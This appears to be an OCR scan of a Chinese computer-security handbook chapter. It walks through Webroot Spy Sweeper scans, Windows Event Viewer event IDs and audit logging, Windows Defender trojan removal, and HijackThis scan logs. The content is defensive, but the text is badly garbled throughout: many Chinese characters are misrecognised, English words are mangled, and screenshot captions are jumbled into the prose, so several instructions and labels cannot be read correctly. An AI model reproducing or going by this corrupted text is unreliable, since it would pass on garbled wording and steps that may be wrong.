No open alerts oHies v Verify Executable Programs 


Schedule This Sweep | | Sweep Now 


单 击 "Options” 按 钮 。 设置 扫描 方式 为 “Quick Sweep”。 
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合 人 他 他 


全- 工具 全 攻略 


STEP03: ” 自 定 义 扫 描 方式 


© webroot Antivirus with Spy Sweeper 


Free Threat Scan - Subscription Inactive Subscribe 


团 optons 


Sweep | Shields | Update | Program | 
Sweep Type About Sweep Options .| 


© Eull Sweep (Recommended) Custom Sweep lets you create custom settings for the search. 
© Quick Sweep 


Sweep Al Attached Drives ystem Restore Folde 
w | Al User Accounts 

w | Direct Disk Sweeping 

w | Rootkits 

w Verify Executable Programs 


W 

Vv Wndows Registry 
Vv Memory Objects 
Vv 

WA 


Cookies 
Compressed Files 


File Extensions to Ignore 
None Selected 


Schedule This Sweep 


选择 “Custom Sweep” 贺 单 击 “Change 
选项 , 并 选择 需要 扫描 的 对 象 。 Settings” 超 链接 。 


STEP05: 返回 主 界 面 


© webroot Antivirus with Spy Sweeper 


Free Threat Scan - Subscription Inactive 


/> Sweep Your Computer 
Sweeping 


How a Sweep Works 


Step 1: Search Your Computer 
The program searches for tems that could 
compromise your computers securrty. 


Step 2: ntine Items Detected 
The program moves detected tems to a holding area, called a 
"Quarantine." You decde what to do with items (keep, 
restore or delete). 
(Quarantine of threats requires an actve subscription.) 


Quarantine 


Active Sweep Options 


$B Virus Sweep: Off 


Gs Drives 
本 地 磁盘 (C:) 
本 地 磁盘 (D:) 
本 地 谱 盘 (E:) 
本 地 磁盘 (F:) 

,Items 

Windows Registry 
Memory Objects 
Cookies 
Files 


芽 Options 
Al User Accounts 
Direct Disk Sweeping 
Compressed Files 
Verify Executable Programs 


3: ns 
The program summarizes the action you designated for each 
found item, 


Start Full Sweep 
Start Quick Sweep 


Start Custom Sweep pdated within the last 


a thorough system 


Sween Ontions 


单 击 “Sweep” 
按钮 。 


STEP07: ”扫描 完成 


© webroot Antivirus with Spy Sweeper 


Free Threat Scan - Subscription Inactive 


成 Sweep Your Computer 


No Malware Found Today 
— | | Keeping your PC malware-free takes a lot of work, especially 
when crafty writers use new techniques to attack your PC. 
Your PC could be targeted at any time. 


在 下 拉 列 表 中 选择 “Start 


千 
Custom Sweep” 命 令 。 


$ Virus Sweep: Off 


Sweep Type Custom 
Search for 


Total Definitions 376,992 


Items Inspected 


Protect your PC with Webroot Memory 4,752 
AntiVirus with Spy Sweeper - 
the #1 rated protection Registry 349,290 


-~ Unrivaled detection and remova 
- Superior spyware blocking 

~ FREE customer support 

- FREE defense updates 


Cookies 246 
Fies/Folders 113,594 


Detected 


Items 0 
Subscribe Now 


Traces 


显示 需要 清除 的 
对 象 。 


单 击 “Schedule” 
按钮 。 
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STEP04: 打开 “Where to Sweep” 对 话 框 


图 计算 机 
和 急 本 地 磁盘 (C:) 
由 - 四 cs 本 地 磁盘 (D:) 
呈 3 本 地 碰 盘 (E:) 
四 -加 本 地 磁盘 (F:) 


| Skip File Types 
| Advanced Options 


用 户 可 以 设置 扫描 或 跳 过 的 具体 对 象 ， 然 后 单 击 
“OK ”按钮 。 


STEP06: 开始 要 描 


© webroot Antivirus with Spy Sweeper 


Free Threat Scan - Subscription Inactive 


司 加 加 
马 Sweep Your Computer @) 


,> Summary 


@) Home 


Ph Sweep 


国 Shields Sweep Status: 0 Items Detected Sweep Details 
Elapsed Time: 7 mnutes BD Virus Sweep: Off 
Sweep Type 


Search for 
Total Definitions 


呀 options 


Custom 


[DD) Schedule E:\tempchace\kuping_s_24243.exe 


376,992 


Items Inspected 
Memory 4,705 


Registry 349,290 
Cookies 246 
Files/Folders 


Detected 
Items 0 


108,273 


Traces 0 


访 Quarantine Selected 


显示 扫描 进度 及 扫描 结果 。 


STEP08: 打开 “Schedule” 页 面 


Next Event 
2013/11/22 1:00 


Last Event: Never 
Next Event: 2013/11/22 1:00 


| EditThisEvent | 


Add Events 
=|] | Add... 


[add a scheduled sweep 


可 创建 定时 扫描 任务 , 包括 扫描 事件 、 开 始 扫 描 时 
同等 
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STEP09: ”设置 各 种 对 象 的 防御 选项 等 


Free Threat Scan - Subscription Inactive 

团 optiors 

= = Antivirus Protection ¢ 。 yy 和 
单 击 "Options” 按 钮 。 


Behavioral Detection 
Activate detection of potential malware based on program characterttics or behaviors. 
| Enable behavioral detection 

Automatically Quarantine behavioral detections 


at 选择 “Shields” 选 项 卡 ， 在 其 中 设置 各 种 对 象 
© open the program to show alert details 的 防御 选项 ， 使 用 户 和 上 网 过 十 程 中 及 时 保 护 系 统 。 


Gamer Mode Options 
加 Turn Execution Shield OFF when entering Gamer Mode 
团 Automatically turn Gamer Mode OFF after 14 上 hour(s). 


17;2.3 ”通过 事件 查看 器 抓 住 “间谍 ” 


如 采用 户 关 心 系 统 的 安全 ， 并 且 想 快捷 地 得 找 出 系统 的 安全 隐患 或 发 生 安全 问题 的 原 
因 , 则 可 通过 Windows 系统 中 事件 丛 看 亏 友 现 一 些 安全 问题 的 再 头 及 已 植 入 系统 的 “间谍 ” 
所 在 。 在 Windows 7 系统 中 打开 事件 奏 看 需 方 法 为 : 右 击 昌 和 面 “ 计 算 机 ”图 标 ， 选 择 “ 管 
理 ”， 打 开 “ 计 算 机 管理 ”窗口 ， 如 下 岁 所 示 ， 单 击 展 开 “ 系 统 工具 ”， 然 后 单 击 “ 事 件 奉 
看 右 ” 即 可 打开 “事件 得 看 右 ” 窗 口 。 


从 岂 计算 机 管理 ee 人 - 
文件 (月 ”操作 (A) ”前 春 (V) ”帮助 (H) 


若 要 查看 已 在 计算 机 上 出 现 的 事件 ， 请 在 控制 台 树 中 选择 相应 的 来 源 、 日 志 或 自 定义 视图 节 辐 
点 。 Cr 而 与 来 源 无 关 。 epson 三 


近 11 小 时 24 小 时 


名 称 描述 修改 时 间 
自 定义 视图 \ 拉 要 页 事件 暂 缺 
自 定义 视图 \ 管 理 训 件 管理 日 志 ...。 暂 缺 


大 小 (当前 修改 时 间 
11.07 M... 2013/12/30 8:32:31 
68 KB/20... 2011/5/26 10:15:52 


“事件 查看 器 ”窗口 
1. 事件 查看 器 查获 “间谍 ”实例 
由 于 日 六 记录 了 系统 运行 过 程 中 大 量 的 操作 事件 ， 为 了 方便 用 户 奉 阅 这 些 信 息 ， 采 取 
了 “编号 ”方式 ， 同 一 编号 代表 同一 类 操作 事件 。 
(1) 编写 : 6006《〈 事 件 日 志 服 务 已 停 用 ， 信 息 ) 
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合 人 他 他 


文件 (月 ”操作 (A) ”查看 (V) 帮助 (H) 


如 外 | 亢 辐 | 日 同 


时 计算 机 管理 Ct) 


日 期 和 时 间 

2013/12/28 0:12:13 EventLog 

2013/12/26 19:51:20 EventLog a 入 县 定义 视图 _ 

2013/12/20 17:53:59 EventLog 也 入选 当前 各 定义 视图 .. 

2013/12/20 14:36:54 EventLog 

2013/12/20 13:39:51 EventLog 

2013/12/20 13:15:57 EventLog 

2013/12/20 11:47:30 EventLog 问 将 自 定义 视图 中 的 所 有 .. 

2013/12/19 18:54:17 EventLog 导出 自 定 义 视图 .… 

2013/12/19 17:16:45 EventLog 香 制 证 定 义 视图 .. 

2013/12/18 21:48:10 EventLog 

2013/12/17 20:02:44 EventLog 

2013/12/16 18:39:31 EventLog 查看 

2013/12/16 16:10:41 EventLog 兴 出险 
0 ent|l 六 Up 


记录 时 间 (D): 2013/12/28 0:12:13 


计算 机 (Ri: 4L8OD1ETPGKV51W 


原因 : 系统 因 关 机 、 重 局 、 朋 误 等 原因 导致 日 六 服务 被 迫 中 止 。 
作用 : 如 果 用 户 的 服务 占 正 党 是 不 关机 的 ， 但 却 出 现 了 这 个 事件 记录 ， 那 么 就 应 该 检 
得 是 否 曾 被 有 秋 意 用 户 在 本 地 或 远程 执行 了 重 局 操作 。 但 对 于 个 人 用 户 来 说 出 现 这 个 信息 则 
ie a 
(2) 编号 : 7001《〈 服 务 被 禁止 ， 错 误 ) 


各 计算 机 管理 
文件 (F) ”操作 (A) ” 音 看 (V) ”帮助 (H) 
名 外 | 方 国 | 日 国 


寺 计算 机 管理 (本 地 ) 


2013/12/30 13:18:48 

2013/12/30 13:18:48 Service Co.,., 
2013/12/30 13:18:48 Service Co,., 
2013/12/30 13:18:45 Service Co... 
2013/12/30 13:18:42 Service Co... 
2013/12/30 13:18:00 Service Co... 
2013/12/30 13:18:00 Service Co,., 
2013/12/30 13:18:00 Service Co.,., 
2013/12/30 13:17:58 Service Co.,.. 
2013/12/30 13:17:58 Service Co.., 
2013/12/30 13:17:58 Service Co.,,. 
2013/12/30 13:17:55 Service Co... 
2013/12/30 13:17:55 Service Co... 


系统 = 
Service Control Manager ”记录 时 间 (D): 2013/12/30 13:18:48 
任务 类 别 W): 无 


关键 字 (g: 经 裴 


计算 机 (R): 4L8OD1ETPGKV51W 


原因 : 与 Computer Browser 服务 相依 的 Server 服务 因 一 些 错误 而 无 法 启动 。 原 因 可 能 
是 已 被 禁用 或 与 其 相关 联 的 设备 没有 局 动 。 

作用 : 应 检查 系统 “服务 ”中 的 Server 等 服务 是 侣 被 关闭 ， 例 如 有 的 单机 用 户 为 了 彻 
底 杜 绝 默认 共享 的 问题 ， 而 将 Server 服务 关闭 。 随 后 当 访 机 进行 组 建 局 域 网 、 访 问 共 享 资 
源 等 操作 时 ， 就 会 因 Server 服务 关闭 而 出 现 这 类 错误 。 
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(3) 编写 : 6005 (事件 日 志 服 务 已 启动， 信息 ) 


和 
露 计算 机 管理 二 人 
文件 用。 挤 作 (A) 重 看 (V) 帮助 (H) wl 
包 中 | 方 加 | 日 国 
其 计算 从 芭 理 [二 地 ) 
人 对 st 工具 
人 计划 EB 序 1 
4 病 事件 坦 看 器 
ee 2013/12/27 17:28:35 
= 和 2013/12/27 8:47:15 EventLog 6005 无 
蚁 Windows 日 志 2013/12/26 19:13:30 EventLog 6005 无 
名 应 用 程序 和 眼 务 日 卉 | 中 信息 2013/12/20 14:38:06 EventLog 6005 无 
汉 订 赔 2013/12/20 13:59:58 EventLog 6005 无 
国共 可 文件 突 2013/12/20 13:52:38 EventLog 6005 无 
蚂 2013/12/20 13:47:13 EventLog 6005 无 
© eis 2013/12/20 1340.38 EventLog 6005 无 
二 设备 管理 器 2013/12/20 13:24:40 EventLog 6005 无 
名 下 入 2013/12/20 13:20:17 EventLog 6005 无 
重 党 主管 理 2013/12/20 13:16:37 EventLog 6005 无 
和 服务 和 应 用 得 序 201212720 13:05:59 EventLog 6005 无 
OA 12.58.50 


来 源 (S): EventLog 记录 时 间 (D): 2013/12/30 8:32:29 
事件 IDG: 6005 任务 类别 WW): 无 

级 别 (): 信息 关 妇 帮 (9: 经典 

用 户 (U): 暂 访 讨 往 机 RY: 4L8OD1ETPGKV51W 


原因 ， 每 次 系统 启动 后 日 忘 服务 均 会 目 动 局 动 并 记载 指定 事件 。 

作用 : 得 知 日 志 服 务工 作 正 常 与 否 。 

2. 安全 日 志 的 启用 

安全 日 六 在 默认 情况 下 是 停 用 的 ， 但 作为 维护 系统 安全 中 最 重要 的 措施 之 一 ， 将 其 
启 显然 是 非常 必要 的 ， 通 过 查阅 安全 日 志 可 以 得 知 系 统 是 否 出 现 过 恶意 入 侵 的 行为 等 。 

启用 安全 日 志 的 具体 操作 步 又 如 下 。 


STEP01: 打开 “运行 ”对 话 杠 STEP02: 打开 “控制 台 ” 窗 口 


操作 (A) ”查看 (V) ”收藏 夫 (O) ”窗口 (W) 帮助 (H) 


新 建 (N) Ctrl+N 
7 Windows 将 根据 和 您 所 办 人 的 名 称 , 为 您 打开 相应 的 程序 、 本 打开 (O).. Ctrl+O 


Ee™/ 保存 (S) Ctrl+S 
文件 夫 、 文 档 或 Internet 资源 。 BA 此 视图 中 没有 可 显示 的 项 目 。 


Ctrl+IM 


1 C\Windowsl..\eventvwr.msc 

2 C\Windowslh...\services.msc 

3 C\Windowsh..\compmgmt.msc 

4 C\Windowshsystem32\comexp.msc 


在 文本 框 中 输入 单 击 “ 确 定 ” 选择 “文件 ”> “添加 /删除 管理 单元 " 菜单 命令 。 
“mmce” 命令 。 按钮 。 
STEP03: ”添加 或 删除 管理 单元 STEP04: 打开 “选择 组 策略 对 象 ” 

对 话 框 


添加 或 齐 | 除 管理 单元 3 
天 上 7 出 法 可用 管理 间 元 并 卫 秆 朋克 一 引 理 间 元 。 对 于 可 扩展 的 管理 单元 您 可 以 村 要 有 用 欢迎 使 用 组 策略 向 导 
可 用 的 管理 单元 6): 所 选 管理 单元 (E); 
六 SEE ea Pi 本 地 组 第 研 对 象 存储 在 本 地 计算 机 上 。 
蕊 高 级 安全 Window... Microsoft ... 出 除 (R) 
王 共 享 文人 icroseft We \ 请 使 用 “ 浏 几 ” 按 思 选 择 组 第 中 对 象 之 一 。 
此 | 计算 机 管理 Microsoft ... 上 移 册 
全 任务 计划 程序 Microsoft ... 一 一 
由 > Microsoft ... Ss 下 称 各 ) | 
件 Microsoft ... ; 组 策略 对 象 : 
ee 。 a 
a Nicrosoft . 本 十 二 初 | 
同性 能 监视 器 Microsoft ... | 三 浏览 (8B)... 
本 证 书 Microsoft . 区) 
IE Be | Microsoft ... 
Microsoft ... ~ 高 级 (0) | 命令 行 启动 时 ， 介 4 元 的 焦 
一 襄 呈 一 “和 


指 述 : 
此 管理 单 坟 允 许 您 编辑 存储 在 计算 机 上 的 本 地 组 策略 对 象 


选择 “组 策略 对 象 单 击 “ 添 加 ”按钮 。 图 选择 “本 地 计算 单 击 “ 完 成 ”按钮 。 
编辑 器 ”选项 。 机 ”选项 。 
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STEP05: 返回 “控制 台 ” 窗 


局 文件 (F) ”操作 (A) 。 查 震 (V) 政 藏 失 (O) 硬 口 (W) 如 助 (H) 
和 本 | 证 园 IX 世 | 日 辣 


加 在 右 侧 窗口 中 右 击 相应 选项 ， 例 如 右 击 “ 审 核 
账户 管理 ”项 ， ee 此 择 “局 人 性" 硕 稚 。 


国 依次 展开 “本 地 计算 机 策略 ”> “用户 配 置 ”> 


“Windows 设 置 ” > “安全 设置 ”> “本 地 策略 ”> 
“审核 策略 ”选项 。 


STEP06: 打开 “审核 账户 管理 属性 ”对 话 框 


宗 核 帐户 管理 屋 性 En 


本 地 安全 设置 
时 审核 帐户 管理 
a 


审核 这 些 操作 : 
加 成 功 3) 


回 失 败 全 ) 


| 在 “本 地 安全 设置 ” 选项 卡 中 勾 选 “成功 ” 和 " 失 
败 ” 复 选 框 。 

证 站 时 哇 其 策略 以 若 代 类 别 级 别 审 核 策 略 ， 则 可 能 不 会 

A 李 生 二 


请 参阅 宙 校 帐户 管理 。 (921468) 


贺 单 击 “确定 ” 按钮 , 此 后 安全 日 志 将 记录 该 项 目 
确定 


的 审核 结果 。 
3. 事件 查看 器 的 管理 


由 于 日 志 记 录 了 大 量 的 系统 信息 ， ee 占用 一 定 的 磁盘 空间 ， 因 此 个 人 计算 机 用 户 应 经 
清除 日 记 以 减少 磁盘 占用 量 。 如 果 和 觉得 日 志 内 容 比较 重要 ， 则 可 将 其 保存 到 安全 的 地 方 。 


El i 


清 言 除 日 直方 


STEP01: 打开 “事件 查看 器 ”窗口 STEP02: 查看 提示 信息 
国 事件 查 持 问 
文件 (] ”操作 (A) ”查看 (V) ”帮助 (H) 
名 外 | 方圆 | 唱 国 

应 用 程序 ”事件 数 : 19,073 
日 期 和 时 间 
2013/12/30 16:28:39 
2013/12/30 16:23:40 


清除 日 志 前 ， 您 可 以 保存 其 内 容 。 
2013/12/30 161840 二 


2013/12/30 16:17:00 


创建 合 定 义 视图 (R)... 
导入 主 定 义 视图 (M).… 
本 2013/12/30 16:13:38 
国 WO. 2013/12/30 16:11:01 
二 EC 2013/12/30 160848 

属性 (P) b 


右 击 需要 清除 的 日 志 ， 在 快捷 菜单 中 和 先 择 “清除 日 ” 单 击 “ 保 存 并 清除 ”按钮 或 者 “清除 ”按钮 皆 
志 ” 命 令 。 
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清除 日 志方 法 二 : 
STEP01: 保存 日 专文 件 STEP02: 查看 日 专属 性 


国 事件 查看 占 -9 “ 国 可 人 查看 
文件 (F) ”把 作 (A) ” 坦 看 (V) ”大助 (H) 文件 (F) ”操作 (A) ” 理 看 (V) ”帮助 (H) 
名 让 | 方 贺 日 贺 名 中 | 方 国 | 日 国 
国 训 件 坦 看 器 (本 地 ) 应 用 程序 ”事件 数 : 19,073 (!) 可 用 的 新 事件 事件 前 看 器 (本 地 ) 应 用 程序 。 事件 数 : 19.073 (!) 可 用 的 新 事件 


全 日 期 和 时 间 永源 “| 区 二 | 级 到 日 时 和 时 间 


最 Wind Windows 日 志 用 程 抒 
ee (全 信息 .2013/12/30 16:28:39 HHcT 相 |e “一 (全 信息 2013/12/30 16:28:39 HHCT 一 | | 辣 打开 保存 的 日 志 .… 
国安 打开 保存 的 日 志 (O).… p013/12/30 16:23:40 cHHCT 目下 打开 保存 的 日 志 (O). b013/12/30 16:23:40 HHCT “| | 孚 创建 和 定义 视图 .. 
目 Ge 创建 自 定义 视图 (R]).… 2013/12/30 16:18:40 HHCT 目 sa 创建 自 定义 视图 (R)… 2013/12/30 16:18:40 HHCT 导入 正定 义 视图 . 
同 系统 导入 自 定义 视图 (M)… 2013/12/30 16:17:00 perfN 辕 有 导入 正定 义 视图 (M).… po013/12/30 16:17:00 perfN 清除 日 志 .。 
目 美发 清除 日 志 ( 〇 -。 p013/12/30 16:13:38 cHHCT 目 转发 清除 日 志 ( 〇 .。 2013/12/30 16:13:38 cHHCT 入 售 渤 当前 日 志 
: 和 应 用 程 月 入选 当前 日 志 (D.。 pO13/12/30 16:11:01 Cc PerfN : 名 应 用 程 月 个 选 当前 日 志 ( 仙 ).。 p013/12/30 16:11:01 cPerfN 
入 订阅 属性 pp) 2013/12130 16:08:48 cc PerfN 习 订阅 2013/12/30 16:08:48 cPerfN 
Ns 2013/12/30 16:08:44 cHHCT EN) 2013/12/30 16:08:44 cHHCT 
一 2013/12/30 16:03:39 HHCT a 2013/12/30 16:03:39 HHCT 
构 所 有 事件 另存 为 (E)-- N13/1273N 15.5R'39 HHCT ~ 将 所 有 事件 另存 为 (E).… n1371273n 15.58.20 HHrT™ 
入 任务 附加 到 此 日 志 (A).. | L 将 任务 附加 到 此 日 志 (A).. 2 
章 看 (V) » Rt x 音 看 (V) » RL x 
RS RH 】 
5 ”上 HHCTRL 的 事件 1D 1903 的 疾 国 ea -上 HHCTRL 的 事件 ID 1903 的 辣 [ 
日 志 名 称 (M): 应 用 程序 日 志 名 称 (M): 应 用 程序 
| “ (ss sd ' TL 
以 不 同名 称 保存 该 日 志 。 


右 击 后 在 快捷 菜单 中 选取 “将 所 有 事件 另存 为 “ 命 。 右 击 后 在 快捷 菜单 中 单 击 “属性 ”命令 。 
令 9 在 删除 前 将 日 志 记 录 保 存 下 来 。 
STIEROS 清除 日 志 


全 名 (有 , Security 


日 志 路 径 (U,; 3%SystemRoot3t\System32VWinevt\Logs\Security.evtx 
日 志 大 小 : 68 KB(69,632 个 字 二 ) 

创建 时 间 : 2011 年 5 月 26 日 10:12:56 

修改 时 间 : 2013 年 11 月 20 日 15:48:17 

访问 时 间 : 2011 年 5 月 26 日 10:12:56 
[J 启用 日 志 记 录 (E) 

日 志 最 大 大 小 { KB )(X): 20480 主 | 

达到 事件 日 志 最 大 大 小 时 : 

加 按 雪 要 本 差事 件 ( 上 日 事 件 优先 }(W) 


5 RE eR 单 击 “ 清 除 日 志 ” 按 钮 ， 将 该 日 志 记录 删除 。 


17;2.4 微软 反 间 谍 专 家 Windows Defender 的 使 用 流程 
Windows Defender 是 一 款 免费 的 反 间 谍 软 件 ， 它 可 以 帮助 用 户 检测 及 清除 一 些 潜 疾 在 
操作 系统 里 的 间谍 软件 及 广告 软件 ， 保 护 用 户 计算 机 不 受到 一 些 间 谍 软 件 的 安全 威胁 及 控 
制 ， 也 保障 了 使 用 者 的 安全 与 隐私 。 其 具体 的 操作 步骤 如 下 。 
STEP01: 打开 “控制 面板 ”窗口 STEP02: 打开 “Windows Defender” 窗 口 


| Windows Defender 


jz| 较 控制 面板 所 有 控制 面板 项 》 = | 4 咱 状 闫 基 汉 画板 
文件 (月 ”编辑 (E) ”查看 (V) 工具 (T) 帮助 (H) 便 z 主页 


9 扫 省 ”> 织 git 二 IC) 
Ee 查看 方式 大 国标 a 快速 扫 撕 (Q) 
保护 计算 机 不 受 间 谍 软 件 和 可 能 不 壹 全 扫 措 (日 


自 定义 扫 拭 (加 … 


/ 


多 Java Ey Program Updates 


BRealtek 高 清晰 音频 管理 器 。 [更 | RemoteApp 和 桌面 连接 ) 检查 有 害 或 可 能 不 雪 要 的 


图 Windows CardSpace | Windows Defender 


多 Windows Update 过 Windows 防火 墙 
史 备份 和 还 原 
启程 遍 和 功能 
储 电 滨 和 项 
在 “控制 面板 " 窗口 中 单 击 “Windows Defender” 单 击 “ 扫 描 ” 右 侧 的 下 拉 按钮 , 选择 对 系统 进行 快 
图 标 。 速 扫描 、 完 全 扫描 或 自 定义 扫描 。 
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y= 


工具 全 攻略 


信人 人 
STEP03: 正在 扫描 STEP04: 返回 主 界 面 


强 Windows Defender - 加 Windows Defender 


OI 


fy 主页 启 扫 省 | 绢 有 要 不 I 聘 @)1” 


7 
保护 计算 机 不 受 间 谋 软件 和 可 能 不 需要 的 软件 的 影响 


保护 计算 机 不 受 间 谋 软件 和 可 能 不 需要 的 软件 的 影响 


ee %/ 检查 有 定 或 可 能 不 表 要 的 项 目 : 总 计 1 个 


扫 控 类 型 ; 完全 扫 控 
he 1550 
OO 严重 /高 警报 级 别 : 1 复查 检测 到 的 项 目 
: 37670 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\real spy monitor\ > 


仿 ， 初 步 扫 捕 结 果 显 示 您 的 计算 机 上 或 许 存在 恶意 软件 或 可 能 不 壬 要 的 软件 。 您 可 以 在 扫 接 结束 后 前 看 检 疯 图] 的 项 | 王立 辣 吕 


扫描 过 程 可 能 需要 一 段 时 间 。 如 果 系 统 中 存在 恶意 检测 完成 后 返回 主 单 击 “ 复 查 检测 到 的 
软件 ， 则 会 出 现 提示 信息 。 界面 ， 查 看 检测 结果 。 ”项 目 " 链接 。 


STEP05: 打开 “Windows Defender STEP06: 删除 成 功 
警报 ”对 话 框 


Windows Defender 革 扩 .2 


Windows Defender 警报 


多 复查 有 害 软件 或 可 能 不 壳 要 的 软件 


& 已 成 功 应 用 请 来 的 操作 


检测 到 可 能 漠 露 您 的 隐私 或 损害 您 的 计算 机 的 程序 。 警报 级 别 的 含义 是 什么 ? 已 应 用 选 定 的 操作 ， 结 果 显 示 在 状态 列 中 。 


检测 到 的 项 目 警报 级 别 。 “操作 


检测 到 的 项 目 警报 级 别 
吉 Trojan: Win32/Cinmeng 高 是 除 


Trojan: Win32/Cinmeng 


显示 详细 信息 D) >> 清 还 系统 E)，] |[ 应 用 操作 (7) 显示 译 细 信息 0) [ 清理 系统 F) 及 ”应 用 操作 (9) | 


可 对 检测 到 的 项 目 进行 单 击 “ 应 用 国 执行 完成 后 会 显示 单 击 “关闭 ， 
删除 、 隔 离 或 允许 操作 。 操作 ”按钮 。 “成 功 " 状态 。 按钮 。 
STEP07:” 返回 主 界 面 STEP08: 打开 “工具 和 设置 ”页 面 


Defender 铀 Windows Defender 
> 


命 / Ed ， 扫描 | 区 亡 史 记录 《YY 了 县 【2 区 


不 受 间 达 软 件 相 可 能 不 圭 要 的 软件 的 呈 响 


选项 Microsoft SpyNet 
选择 您 状 望 的 该 加 入 在 线 社 区 ， 帮助 识别 和 


程序 的 运行 方 阻止 间 谋 软件 感染 . 


经 32 天 没有 扫描 计算 机 。 建 议 安排 > 


允许 的 项 目 


单 击 工具 按钮 。 单 击 “ 选 项 ”链接 。 
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系统 安全 防护 工具 


STEP09: ”打开 “选项 ”窗口 
读 ] Windows Defender 


保护 计算 机 不 受 间 府 软 件 和 可 能 不 需要 的 软件 的 影响 
i 
z 人、 


默认 译作 加 自动 委 撕 计算 机 (推荐 )}(U) 

实时 保护 频率 (Q): 

排除 的 文件 和 文件 夫 每 天 = | 

ee 大 约 时 间 站 ): 

ee PE "| 可 设置 自动 扫描 的 时 间 、 频 率 以 及 扫描 类 型 ， 并 且 
关 型 (p); 


可 设置 默认 操作 以 及 选择 是 否 使 用 实时 保护 。 


回 | 扫 拭 前 检查 更 新 的 定义 (和 


加 仅 当 系 统 空闲 时 运行 扫 扒 (R) 


RS 


网 络 给 人 们 带 来 了 无 尽 便 捷 ， 但 也 存在 着 安全 隐患 。 为 了 将 安全 隐患 降 到 最 低 ， 最 便 
捷 有 效 的 做 法 就 是 做 好 网 络 的 安全 防御 工作 。 


113.1 浏 贤 器 绑 染 元 星 负 JackThis 


HijackThis 是 一 于 专门 对 付 恶 意 网 页 及 木 咏 的 程 | 序 ， 可 将 绑 以 浏览 右 的 全 部 悉 意 程序 
找 出 来 并 将 其 删 际 。 一 般 第 见 的 绑 染 方式 钢 过 于 强制 审改 浏览 器 首页 设 定 和 搜寻 页 设 定 。 
如 果 用 户 使 用 了 HijackThis 软件 ， 束 可 以 将 所 有 可 疑 的 程序 全 “ 抓 ”出 来 ， 再 让 用 户 判 断 
哪个 程序 是 泌 神 者 并 将 其 清除 。 有 具体 的 操作 步骤 如 下 。 
STEP01: 运行 HijackThis STEP02: ”开始 扫描 系统 


曙 Trend Micro HijackThis - v2.0.4 , 重 Trend Micro HijackThis - v2.0.4 


Welcome to HijackThis, This program will scan your PC and generate a log flle of 
registry and file settings commonly manipulated by malware as well as good 
software, 


—Main Menu 而]02 - BHD: Rising Web Helper - {14ASESBT-034B-471A-8908-598ABA93B24B} - D:\ 安 装 \Risine\Ka 里 
02 - BHO: Lyne Click to Call BHO -~ {31D09BAO-12FS5-4CCE-BPESA-2923ET660S5DA} - C:\Program Fi 

What would you like to do? 02 - BHO: Ad-Aware Security Add-on - {6c97a91e-4524-4019-86af-2aa2d56Tbf5c} - C:\Program 
02 - BHO: XunleiBHO - {889D2FEB-S411-4565-8998-1DD2C5261283} ~ D: 安装 \BHD\Xunl eiBHDT. 2.】 三 

02 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:APRDGKA>1ANICROS 

| 上 02 - BHO: Safellon Class - {B89F34DD-FOF9-42DC-9EDD-957187DAB88D} - D:\Program Files\360%: 

02 - BH0: 中 国 工商 银行 BHD - {BB4491A2-D11A-4c6b-91C0-BS3246A3122B} - C:\Program FilesvICI 

De | [102 - BHO: QAMiniDLBHOHelper - {CACT334B-5857-41el-8FT9-FBAACECADSF4} - C:\Program Files\t 

02 - BHO: Microsoft SkyDrive Pro Browser Helper — {D0498E0A-45B7T-42AE-A9AA-ABA4BSDBDSBF} 

02 - BHO: AccountProtect — {DDD362CF-523B-4BC9-8FDC-58F93B6BC945} - C:\Users\Administratr 

03 - Toolbar: Ad-Aware Security Add-on - {6c9Tadle-4524-4019-86af-2aa2d56Tbf5c} - C:\Prot 

04 - HEIMN.. \Run: [InterPass3000_ICBC] C:\Program Files\TCBCEbanlkToolsAFeitian-TInterFass: 

View the list of badaups | 04 - HFKIMN.. \Run: [SNDTray] “C:\Program Files\Spybot - Search & Destroy 2\SDTray. exe” 
“04 - HKINM\.. \Run: [360Safetray] “D:\Program Files\380\3B0safe\safemon\360tray. exe” /start 
Open the Misc Tools section | 04 - HKINM\.. \Run: [SystemTray] SysTray. Exe 
04 - HEINM\,. \Run: [BaiduinTray] “C:\Program Files\Baidu\BaiduAn\l.1.0., 489\BaiduhnTray, ext 
]04 - HK. .ARun: [木马 清除 专家 ] D0:\ 安 装 \ 水 马 清除 专家 2014h\mmqezji. exe 
04 - HRM. .ARun: [Windows 木 马 防火 墙 ] C: ftc2010\Trojanwall. exe 

。 04 - HHIM.. \Run: [Ad-Aware Browsing oor et “C:\ProgramData\hd-Aware Browsing Protet 

ee 04 - HEIM\.. \Run: [Search Protection] C:\ProgramData\Search Protection\SearchProtection. ¢ 

04 - HKCWUA. .Run:， [键盘 辅助 程序 《禁止 后 可 能 SS 无 法 输入 中 文 ) ] Wi: aserTemp\360zip$TempA3E 


O04 - HRCU\. . ‘RunDnce: [adawarebp] reg. exe delete “HECU\Software\AppDataLow\Software\adawt 
04 - HECUN.. ‘RunDnce: [adawarebp XPF] reg. exe delete “HECU\Software\adawarebp” /Ef 


i Nd - HISAS-1-S-19% MRun: [Sidehar] YXPrnmranFileswWinanws SideharhSidahar ave fantaRun 
one of the above, just s program Scan & fix stuff Other stuff 


I¥ Do not show this window when I start HijackThis SCe ix checker Info... | Config... 


Add checked to ignorelist 


在 “HijackThis” 主 窗口 中 单 击 “Do a system scan 查看 扫描 信息 。 
and save a logfile” 按 钮 。 
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合 人 他 他 


Pe > 


具 全 攻略 


STEP03: 查看 扫描 结果 


9 hijackthis,log -记事 本 

文件 (Pi “篇 丝 (E) 格式 (QO) 查 春 (V) 帮助 (H) 

Logfile of Trend Micro HijackThis v2. 0.4 
Scan saved at 16:00:04, on 2014/2/18 
Platform: Windows 7 SP1 (WinNT 6. 00. 3505) 
MSIE: Internet Fxplorer v11.0 (11. 00. 9600. 1 
Boot mode: Normal 


Running processes: 
C:\Windows\system32\taskhost. exe 


C:\Windows\system32\Dwm. exe 
C:\Windows\Explorer. EXE 

C:\Program Files\ICBCEbankTools\Feitian— 
InterPass3000\certd nps3000 ICBC. exe 
C:\Program Files\Spybot — Search & Destroy 
2\SDTray. exe 

D:\Program Files\360\360safe\safemon\360trsa 
C:\Program Files\Baidu\BaiduAn 
\1.1.0.489\BaiduAnTray. exe 
C:\ftc2010\Trojanwall. exe 


扫描 结果 将 会 保存 到 记事 本 中 。 


STEP05: ”查看 说 明 信 息 


BD O2 - BHO: Rising Web Helper - 

» {14A5E567-034B-471A-89D8-598A6A93B24B} - DA 安装 
\Rising\Rav\rsscrbho.d|| 
